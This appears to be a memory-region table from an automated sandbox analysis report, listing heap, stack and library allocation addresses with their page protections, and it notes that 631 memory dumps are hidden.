||
|
1B137809000
|
heap
|
page read and write
|
||
|
279C482B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC65000
|
trusted library allocation
|
page read and write
|
||
|
279C38D3000
|
trusted library allocation
|
page read and write
|
||
|
DE7167F000
|
stack
|
page read and write
|
||
|
1B1370B3000
|
heap
|
page read and write
|
||
|
1B13781B000
|
heap
|
page read and write
|
||
|
1A934FB0000
|
heap
|
page read and write
|
||
|
279C27D0000
|
trusted library section
|
page read and write
|
||
|
1F2D7E90000
|
heap
|
page execute and read and write
|
||
|
1B1376FE000
|
heap
|
page read and write
|
||
|
279C0D20000
|
heap
|
page read and write
|
||
|
279C4AF4000
|
trusted library allocation
|
page read and write
|
||
|
1B137816000
|
heap
|
page read and write
|
||
|
279C50B8000
|
trusted library allocation
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
FE0D7FB000
|
stack
|
page read and write
|
||
|
1F2D8010000
|
heap
|
page read and write
|
||
|
1B1370C8000
|
heap
|
page read and write
|
||
|
1B1377F6000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
1B137704000
|
heap
|
page read and write
|
||
|
1A934E67000
|
heap
|
page read and write
|
||
|
279C40A1000
|
trusted library allocation
|
page read and write
|
||
|
1F2D7FB1000
|
heap
|
page read and write
|
||
|
1B13775C000
|
heap
|
page read and write
|
||
|
FE0E20A000
|
stack
|
page read and write
|
||
|
1B13776F000
|
heap
|
page read and write
|
||
|
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
1F2BDF5C000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
279C27F0000
|
heap
|
page read and write
|
||
|
1B137765000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA73000
|
trusted library allocation
|
page read and write
|
||
|
1B1376F3000
|
heap
|
page read and write
|
||
|
1B137765000
|
heap
|
page read and write
|
||
|
1A934FB4000
|
heap
|
page read and write
|
||
|
FE0CAF7000
|
stack
|
page read and write
|
||
|
1F2BFBA0000
|
trusted library allocation
|
page read and write
|
||
|
279C4BC5000
|
trusted library allocation
|
page read and write
|
||
|
1A934E08000
|
heap
|
page read and write
|
||
|
1B1377E6000
|
heap
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
1F2D8350000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1B137761000
|
heap
|
page read and write
|
||
|
1F2BFA81000
|
trusted library allocation
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
279C2820000
|
trusted library allocation
|
page read and write
|
||
|
1A934DDD000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
1B137759000
|
heap
|
page read and write
|
||
|
279C2810000
|
heap
|
page read and write
|
||
|
DE718FE000
|
stack
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
279DAE07000
|
heap
|
page read and write
|
||
|
7FFD9B732000
|
trusted library allocation
|
page read and write
|
||
|
1F2D7EF0000
|
heap
|
page read and write
|
||
|
FE0DF8A000
|
stack
|
page read and write
|
||
|
1A935106000
|
heap
|
page read and write
|
||
|
279C0DE3000
|
heap
|
page read and write
|
||
|
7FFD9BC48000
|
trusted library allocation
|
page read and write
|
||
|
1A9350E0000
|
trusted library allocation
|
page read and write
|
||
|
1A936A54000
|
heap
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
1A936A70000
|
heap
|
page read and write
|
||
|
1B137674000
|
heap
|
page read and write
|
||
|
DE71A7E000
|
stack
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
1A93510C000
|
heap
|
page read and write
|
||
|
7FFD9BD05000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page execute and read and write
|
||
|
FE0DA8E000
|
stack
|
page read and write
|
||
|
1F2BE0B0000
|
heap
|
page execute and read and write
|
||
|
1A934D7E000
|
heap
|
page read and write
|
||
|
1F2BFF60000
|
trusted library allocation
|
page read and write
|
||
|
1B137749000
|
heap
|
page read and write
|
||
|
279C0D30000
|
heap
|
page read and write
|
||
|
1B1377CE000
|
heap
|
page read and write
|
||
|
7FFD9BC15000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFF1E000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFBD5000
|
trusted library allocation
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
1F2BDF64000
|
heap
|
page read and write
|
||
|
7FFD9B7F6000
|
trusted library allocation
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
1F2BE0C0000
|
heap
|
page read and write
|
||
|
1B13785F000
|
heap
|
page read and write
|
||
|
7FFD9BAAC000
|
trusted library allocation
|
page read and write
|
||
|
279C0E8E000
|
heap
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
279C4B3B000
|
trusted library allocation
|
page read and write
|
||
|
279C2815000
|
heap
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F2BE011000
|
heap
|
page read and write
|
||
|
1F2CFAE0000
|
trusted library allocation
|
page read and write
|
||
|
1F2BE00C000
|
heap
|
page read and write
|
||
|
7FFD9BC13000
|
trusted library allocation
|
page read and write
|
||
|
279DB763000
|
heap
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
279C4082000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFB06000
|
trusted library allocation
|
page read and write
|
||
|
1A934E23000
|
heap
|
page read and write
|
||
|
1A934DDD000
|
heap
|
page read and write
|
||
|
279DB21D000
|
heap
|
page read and write
|
||
|
7FFD9B914000
|
trusted library allocation
|
page read and write
|
||
|
FE0CCFE000
|
stack
|
page read and write
|
||
|
1A934E4F000
|
heap
|
page read and write
|
||
|
1B13780B000
|
heap
|
page read and write
|
||
|
1A93510D000
|
heap
|
page read and write
|
||
|
785A3FD000
|
stack
|
page read and write
|
||
|
1F2D7FC5000
|
heap
|
page read and write
|
||
|
1F2BFA00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
DE713EF000
|
stack
|
page read and write
|
||
|
1B13780D000
|
heap
|
page read and write
|
||
|
1B137826000
|
heap
|
page read and write
|
||
|
7FFD9BB07000
|
trusted library allocation
|
page read and write
|
||
|
1B1376F4000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
1B1378D8000
|
heap
|
page read and write
|
||
|
7FFD9BC85000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC1F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
1A934FCE000
|
heap
|
page read and write
|
||
|
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
|
1A934DCD000
|
heap
|
page read and write
|
||
|
279DB778000
|
heap
|
page read and write
|
||
|
1B1375FF000
|
heap
|
page read and write
|
||
|
FE0C7F8000
|
stack
|
page read and write
|
||
|
1F2BFF58000
|
trusted library allocation
|
page read and write
|
||
|
DE719F9000
|
stack
|
page read and write
|
||
|
1A934E65000
|
heap
|
page read and write
|
||
|
7FFD9BC1A000
|
trusted library allocation
|
page read and write
|
||
|
279DB06C000
|
heap
|
page read and write
|
||
|
1F2BFB22000
|
trusted library allocation
|
page read and write
|
||
|
279C48C8000
|
trusted library allocation
|
page read and write
|
||
|
1A934E41000
|
heap
|
page read and write
|
||
|
1B137765000
|
heap
|
page read and write
|
||
|
1B1375E0000
|
heap
|
page read and write
|
||
|
DE71323000
|
stack
|
page read and write
|
||
|
7FFD9BC44000
|
trusted library allocation
|
page read and write
|
||
|
1B137709000
|
heap
|
page read and write
|
||
|
7FFD9B743000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A934E6E000
|
heap
|
page read and write
|
||
|
1B137755000
|
heap
|
page read and write
|
||
|
1B1376C4000
|
heap
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
1B137815000
|
heap
|
page read and write
|
||
|
1B137721000
|
heap
|
page read and write
|
||
|
785A6FE000
|
stack
|
page read and write
|
||
|
279DB060000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
279C0D90000
|
heap
|
page read and write
|
||
|
1B13785F000
|
heap
|
page read and write
|
||
|
FE0DB0E000
|
stack
|
page read and write
|
||
|
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
279D2D41000
|
trusted library allocation
|
page read and write
|
||
|
1B137701000
|
heap
|
page read and write
|
||
|
279DB290000
|
trusted library allocation
|
page read and write
|
||
|
279DB050000
|
heap
|
page read and write
|
||
|
1A934E43000
|
heap
|
page read and write
|
||
|
1F2D7F86000
|
heap
|
page read and write
|
||
|
1F2BFB89000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFBDB000
|
trusted library allocation
|
page read and write
|
||
|
FE0DE8A000
|
stack
|
page read and write
|
||
|
1B137776000
|
heap
|
page read and write
|
||
|
279D2D71000
|
trusted library allocation
|
page read and write
|
||
|
279C40C5000
|
trusted library allocation
|
page read and write
|
||
|
279C4086000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
279DAE3D000
|
heap
|
page read and write
|
||
|
1A934E44000
|
heap
|
page read and write
|
||
|
279C2800000
|
heap
|
page readonly
|
||
|
1B137665000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
1A934FD9000
|
heap
|
page read and write
|
||
|
1A936A80000
|
heap
|
page read and write
|
||
|
7FFD9BD40000
|
trusted library allocation
|
page read and write
|
||
|
279DAD7B000
|
heap
|
page read and write
|
||
|
1F2BE070000
|
trusted library allocation
|
page read and write
|
||
|
1B137756000
|
heap
|
page read and write
|
||
|
279C49FB000
|
trusted library allocation
|
page read and write
|
||
|
1B13776D000
|
heap
|
page read and write
|
||
|
7FFD9B826000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F2D7EE7000
|
heap
|
page execute and read and write
|
||
|
1B1370B2000
|
heap
|
page read and write
|
||
|
7FFD9B917000
|
trusted library allocation
|
page read and write
|
||
|
1B137768000
|
heap
|
page read and write
|
||
|
1F2D7F0F000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F2BDF28000
|
heap
|
page read and write
|
||
|
1B1378D0000
|
heap
|
page read and write
|
||
|
7DF493030000
|
trusted library allocation
|
page execute and read and write
|
||
|
DE71B7E000
|
stack
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
FE0E289000
|
stack
|
page read and write
|
||
|
1B1370B7000
|
heap
|
page read and write
|
||
|
7FFD9BB33000
|
trusted library allocation
|
page read and write
|
||
|
1B1376DE000
|
heap
|
page read and write
|
||
|
7FFD9B912000
|
trusted library allocation
|
page read and write
|
||
|
1B1377EF000
|
heap
|
page read and write
|
||
|
FE0DF0B000
|
stack
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
7FFD9BBF2000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFAB4000
|
trusted library allocation
|
page read and write
|
||
|
1F2BE0C4000
|
heap
|
page read and write
|
||
|
1B1370B6000
|
heap
|
page read and write
|
||
|
1F2D80F0000
|
heap
|
page read and write
|
||
|
DE717FE000
|
stack
|
page read and write
|
||
|
1A934E51000
|
heap
|
page read and write
|
||
|
279DB253000
|
trusted library allocation
|
page read and write
|
||
|
1B137847000
|
heap
|
page read and write
|
||
|
7FFD9BD60000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFA71000
|
trusted library allocation
|
page read and write
|
||
|
279D2D61000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8FA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
279DB5CC000
|
heap
|
page read and write
|
||
|
1B13786C000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B74D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F2BFB8F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
1F2D7F5C000
|
heap
|
page read and write
|
||
|
7FFD9BC2A000
|
trusted library allocation
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
1B137654000
|
heap
|
page read and write
|
||
|
1B13776D000
|
heap
|
page read and write
|
||
|
279DB228000
|
heap
|
page read and write
|
There are 631 hidden memdumps, click here to show them.